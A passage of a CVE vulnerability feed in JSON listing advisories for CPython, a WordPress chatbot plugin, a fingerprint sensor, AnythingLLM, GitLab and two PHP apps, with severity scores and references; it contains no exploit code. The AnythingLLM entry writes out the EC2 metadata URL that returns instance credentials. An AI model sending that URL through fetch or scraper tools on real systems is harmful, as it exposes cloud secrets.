"refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/70497218351ba44bffc8b571201ecb5652d84675", "name" : "https://github.com/python/cpython/commit/70497218351ba44bffc8b571201ecb5652d84675", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/70497218351ba44bffc8b571201ecb5652d84675", "name" : "https://github.com/python/cpython/commit/70497218351ba44bffc8b571201ecb5652d84675", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/a2c59992e9e8d35baba9695eb186ad6c6ff85c51", "name" : "https://github.com/python/cpython/commit/a2c59992e9e8d35baba9695eb186ad6c6ff85c51", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/a2c59992e9e8d35baba9695eb186ad6c6ff85c51", "name" : "https://github.com/python/cpython/commit/a2c59992e9e8d35baba9695eb186ad6c6ff85c51", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/a956e510f6336d5ae111ba429a61c3ade30a7549", "name" : "https://github.com/python/cpython/commit/a956e510f6336d5ae111ba429a61c3ade30a7549", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/a956e510f6336d5ae111ba429a61c3ade30a7549", "name" : "https://github.com/python/cpython/commit/a956e510f6336d5ae111ba429a61c3ade30a7549", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/d05bac0b74153beb541b88b4fca33bf053990183", "name" : "https://github.com/python/cpython/commit/d05bac0b74153beb541b88b4fca33bf053990183", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/d05bac0b74153beb541b88b4fca33bf053990183", "name" : "https://github.com/python/cpython/commit/d05bac0b74153beb541b88b4fca33bf053990183", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/fa181fcf2156f703347b03a3b1966ce47be8ab3b", "name" : "https://github.com/python/cpython/commit/fa181fcf2156f703347b03a3b1966ce47be8ab3b", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/fa181fcf2156f703347b03a3b1966ce47be8ab3b", "name" : "https://github.com/python/cpython/commit/fa181fcf2156f703347b03a3b1966ce47be8ab3b", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/issues/109858", "name" : "https://github.com/python/cpython/issues/109858", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/issues/109858", "name" : "https://github.com/python/cpython/issues/109858", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00024.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00024.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00024.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00024.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00025.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00025.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00025.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00025.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T3IGRX54M7RNCQOXVQO5KQKTGWCOABIM/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T3IGRX54M7RNCQOXVQO5KQKTGWCOABIM/", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T3IGRX54M7RNCQOXVQO5KQKTGWCOABIM/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T3IGRX54M7RNCQOXVQO5KQKTGWCOABIM/", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U5VHWS52HGD743C47UMCSAK2A773M2YE/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U5VHWS52HGD743C47UMCSAK2A773M2YE/", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U5VHWS52HGD743C47UMCSAK2A773M2YE/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U5VHWS52HGD743C47UMCSAK2A773M2YE/", "refsource" : "", "tags" : [ ] }, { "url" : "https://mail.python.org/archives/list/security-announce@python.org/thread/XELNUX2L3IOHBTFU7RQHCY6OUVEWZ2FG/", "name" : "https://mail.python.org/archives/list/security-announce@python.org/thread/XELNUX2L3IOHBTFU7RQHCY6OUVEWZ2FG/", "refsource" : "", "tags" : [ ] }, { "url" : "https://mail.python.org/archives/list/security-announce@python.org/thread/XELNUX2L3IOHBTFU7RQHCY6OUVEWZ2FG/", "name" : "https://mail.python.org/archives/list/security-announce@python.org/thread/XELNUX2L3IOHBTFU7RQHCY6OUVEWZ2FG/", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.netapp.com/advisory/ntap-20250411-0005/", "name" : "https://security.netapp.com/advisory/ntap-20250411-0005/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.bamsoftware.com/hacks/zipbomb/", "name" : "https://www.bamsoftware.com/hacks/zipbomb/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.bamsoftware.com/hacks/zipbomb/", "name" : "https://www.bamsoftware.com/hacks/zipbomb/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An issue was found in the CPython `zipfile` module affecting versions 3.12.1, 3.11.7, 3.10.13, 3.9.18, and 3.8.18 and prior.\n\nThe zipfile module is vulnerable to “quoted-overlap” zip-bombs which exploit the zip format to create a zip-bomb with a high compression ratio. The fixed versions of CPython makes the zipfile module reject zip archives which overlap entries in the archive.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-19T16:15Z", "lastModifiedDate" : "2025-04-11T22:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0451", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/chatbot/trunk/includes/openai/qcld-bot-openai.php#L175", "name" : "https://plugins.trac.wordpress.org/browser/chatbot/trunk/includes/openai/qcld-bot-openai.php#L175", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/chatbot/trunk/includes/openai/qcld-bot-openai.php#L175", "name" : "https://plugins.trac.wordpress.org/browser/chatbot/trunk/includes/openai/qcld-bot-openai.php#L175", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3089461/chatbot/trunk/includes/openai/qcld-bot-openai.php", "name" : "https://plugins.trac.wordpress.org/changeset/3089461/chatbot/trunk/includes/openai/qcld-bot-openai.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3089461/chatbot/trunk/includes/openai/qcld-bot-openai.php", "name" : "https://plugins.trac.wordpress.org/changeset/3089461/chatbot/trunk/includes/openai/qcld-bot-openai.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1c0572a5-6cc9-43ab-a4a3-c8d3b93c8fcf?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1c0572a5-6cc9-43ab-a4a3-c8d3b93c8fcf?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1c0572a5-6cc9-43ab-a4a3-c8d3b93c8fcf?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1c0572a5-6cc9-43ab-a4a3-c8d3b93c8fcf?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The AI ChatBot plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the openai_file_list_callback function in all versions up to, and including, 5.3.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to list files existing in a linked OpenAI account." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:quantumcloud:wpbot:*:*:*:*:free:wordpress:*:*", "versionEndExcluding" : "5.3.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.0, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 1.4 } }, "publishedDate" : "2024-05-22T04:15Z", "lastModifiedDate" : "2025-05-12T13:58Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0452", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/chatbot/trunk/includes/openai/qcld-bot-openai.php#L208", "name" : "https://plugins.trac.wordpress.org/browser/chatbot/trunk/includes/openai/qcld-bot-openai.php#L208", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/chatbot/trunk/includes/openai/qcld-bot-openai.php#L208", "name" : "https://plugins.trac.wordpress.org/browser/chatbot/trunk/includes/openai/qcld-bot-openai.php#L208", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3089461/chatbot/trunk/includes/openai/qcld-bot-openai.php", "name" : "https://plugins.trac.wordpress.org/changeset/3089461/chatbot/trunk/includes/openai/qcld-bot-openai.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3089461/chatbot/trunk/includes/openai/qcld-bot-openai.php", "name" : "https://plugins.trac.wordpress.org/changeset/3089461/chatbot/trunk/includes/openai/qcld-bot-openai.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/34b6475c-b5dd-42a1-98d1-9b5ae9ff4ad5?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/34b6475c-b5dd-42a1-98d1-9b5ae9ff4ad5?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/34b6475c-b5dd-42a1-98d1-9b5ae9ff4ad5?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/34b6475c-b5dd-42a1-98d1-9b5ae9ff4ad5?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The AI ChatBot plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the openai_file_upload_callback function in all versions up to, and including, 5.3.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload files to a linked OpenAI account." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:quantumcloud:wpbot:*:*:*:*:free:wordpress:*:*", "versionEndExcluding" : "5.3.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 7.7, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.1, "impactScore" : 4.0 } }, "publishedDate" : "2024-05-22T04:15Z", "lastModifiedDate" : "2025-05-12T13:59Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0453", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/chatbot/trunk/includes/openai/qcld-bot-openai.php#L133", "name" : "https://plugins.trac.wordpress.org/browser/chatbot/trunk/includes/openai/qcld-bot-openai.php#L133", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/chatbot/trunk/includes/openai/qcld-bot-openai.php#L133", "name" : "https://plugins.trac.wordpress.org/browser/chatbot/trunk/includes/openai/qcld-bot-openai.php#L133", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3089461/chatbot/trunk/includes/openai/qcld-bot-openai.php", "name" : "https://plugins.trac.wordpress.org/changeset/3089461/chatbot/trunk/includes/openai/qcld-bot-openai.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3089461/chatbot/trunk/includes/openai/qcld-bot-openai.php", "name" : "https://plugins.trac.wordpress.org/changeset/3089461/chatbot/trunk/includes/openai/qcld-bot-openai.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7e0ef4a5-42d7-4cea-b19f-51917e3ee55f?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7e0ef4a5-42d7-4cea-b19f-51917e3ee55f?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7e0ef4a5-42d7-4cea-b19f-51917e3ee55f?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7e0ef4a5-42d7-4cea-b19f-51917e3ee55f?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The AI ChatBot plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the openai_file_delete_callback function in all versions up to, and including, 5.3.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete files from a linked OpenAI account." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:quantumcloud:wpbot:*:*:*:*:free:wordpress:*:*", "versionEndExcluding" : "5.3.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 7.7, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.1, "impactScore" : 4.0 } }, "publishedDate" : "2024-05-22T04:15Z", "lastModifiedDate" : "2025-05-12T14:00Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0454", "ASSIGNER" : "psirt@emc.com.tw" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-290" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/advisories/GHSA-w3jx-33qh-77f8", "name" : "https://github.com/advisories/GHSA-w3jx-33qh-77f8", "refsource" : "MISC", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.emc.com.tw/emc/tw/vulnerability-disclosure-policy", "name" : "https://www.emc.com.tw/emc/tw/vulnerability-disclosure-policy", "refsource" : "", "tags" : [ "Not Applicable" ] }, { "url" : "https://www.emc.com.tw/emc/tw/vulnerability-disclosure-policy", "name" : "https://www.emc.com.tw/emc/tw/vulnerability-disclosure-policy", "refsource" : "", "tags" : [ "Not Applicable" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "ELAN Match-on-Chip FPR solution has design fault about potential risk of valid SID leakage and enumeration with spoof sensor.\nThis fault leads to that Windows Hello recognition would be bypass with cloning SID to cause broken account identity.\nVersion which is lower than 3.0.12011.08009(Legacy)/3.3.12011.08103(ESS) would suffer this risk on DELL Inspiron platform." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:emc:elan_match-on-chip_fpr_solution_firmware:3.0.12011.08009:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:emc:elan_match-on-chip_fpr_solution_firmware:3.3.12011.08103:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:emc:elan_match-on-chip_fpr_solution:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "attackVector" : "PHYSICAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 0.9, "impactScore" : 5.2 } }, "publishedDate" : "2024-01-12T02:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0455", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mintplex-labs/anything-llm/commit/b2b2c2afe15c48952d57b4d01e7108f9515c5f55", "name" : "https://github.com/mintplex-labs/anything-llm/commit/b2b2c2afe15c48952d57b4d01e7108f9515c5f55", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/mintplex-labs/anything-llm/commit/b2b2c2afe15c48952d57b4d01e7108f9515c5f55", "name" : "https://github.com/mintplex-labs/anything-llm/commit/b2b2c2afe15c48952d57b4d01e7108f9515c5f55", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/07d83b49-7ebb-40d2-83fc-78381e3c5c9c", "name" : "https://huntr.com/bounties/07d83b49-7ebb-40d2-83fc-78381e3c5c9c", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://huntr.com/bounties/07d83b49-7ebb-40d2-83fc-78381e3c5c9c", "name" : "https://huntr.com/bounties/07d83b49-7ebb-40d2-83fc-78381e3c5c9c", "refsource" : "", "tags" : [ "Exploit" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The inclusion of the web scraper for AnythingLLM means that any user with the proper authorization level (manager, admin, and when in single user) could put in the URL\n```\nhttp://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance\n```\nwhich is a special IP and URL that resolves only when the request comes from within an EC2 instance. This would allow the user to see the connection/secret credentials for their specific instance and be able to manage it regardless of who deployed it.\n\nThe user would have to have pre-existing knowledge of the hosting infra which the target instance is deployed on, but if sent - would resolve if on EC2 and the proper `iptable` or firewall rule is not configured for their setup." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mintplexlabs:anythingllm:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-26T16:27Z", "lastModifiedDate" : "2025-02-27T03:05Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0456", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/", "name" : "https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/", "name" : "https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/430726", "name" : "GitLab Issue #430726", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/430726", "name" : "GitLab Issue #430726", "refsource" : "", "tags" : [ "Broken Link" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An authorization vulnerability exists in GitLab versions 14.0 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. An unauthorized attacker is able to assign arbitrary users to MRs that they created within the project" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:16.8.0:*:*:*:community:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:16.8.0:*:*:*:enterprise:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "16.7.0", "versionEndExcluding" : "16.7.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "16.7.0", "versionEndExcluding" : "16.7.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "14.0.0", "versionEndExcluding" : "16.6.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "14.0.0", "versionEndExcluding" : "16.6.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-26T01:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0459", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1nSgSw1cTXZWeYTjt4rliMIDHyQcGK-8z/view?usp=sharing", "name" : "https://drive.google.com/file/d/1nSgSw1cTXZWeYTjt4rliMIDHyQcGK-8z/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1nSgSw1cTXZWeYTjt4rliMIDHyQcGK-8z/view?usp=sharing", "name" : "https://drive.google.com/file/d/1nSgSw1cTXZWeYTjt4rliMIDHyQcGK-8z/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250564", "name" : "https://vuldb.com/?ctiid.250564", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250564", "name" : "https://vuldb.com/?ctiid.250564", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250564", "name" : "https://vuldb.com/?id.250564", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250564", "name" : "https://vuldb.com/?id.250564", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Blood Bank & Donor Management 5.6 and classified as critical. This vulnerability affects unknown code of the file /admin/request-received-bydonar.php. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250564." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:blood_bank_\\&_donor_management_system:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-12T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0460", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/BxYQ/vul/blob/main/2Faculty%20Management%20System-SQL.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/2Faculty%20Management%20System-SQL.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/BxYQ/vul/blob/main/2Faculty%20Management%20System-SQL.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/2Faculty%20Management%20System-SQL.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250565", "name" : "https://vuldb.com/?ctiid.250565", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250565", "name" : "https://vuldb.com/?ctiid.250565", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250565", "name" : "https://vuldb.com/?id.250565", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250565", "name" : "https://vuldb.com/?id.250565", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Faculty Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/pages/student-print.php. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250565 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:carmelogarcia:faculty_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", 